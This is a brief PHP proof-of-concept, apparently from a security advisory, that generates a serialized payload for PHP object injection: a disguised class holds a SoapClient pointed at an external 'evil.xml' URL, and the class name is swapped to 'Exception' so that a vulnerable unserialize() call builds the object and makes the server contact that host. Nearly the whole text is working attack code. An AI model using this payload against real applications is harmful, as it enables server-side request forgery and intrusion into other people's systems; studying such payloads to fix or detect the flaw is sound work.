- serialize: documentation ( source)
- str_replace: documentation ( source)
<?php
class Exc3pt10n
{
private $previous;
function __construct()
{
$this->previous = new SoapClient(null, array('uri' => '', 'location' => 'http://karmainsecurity.com/evil.xml'));
}
}
print(str_replace('Exc3pt10n', 'Exception', serialize(array('test' => new Exc3pt10n))));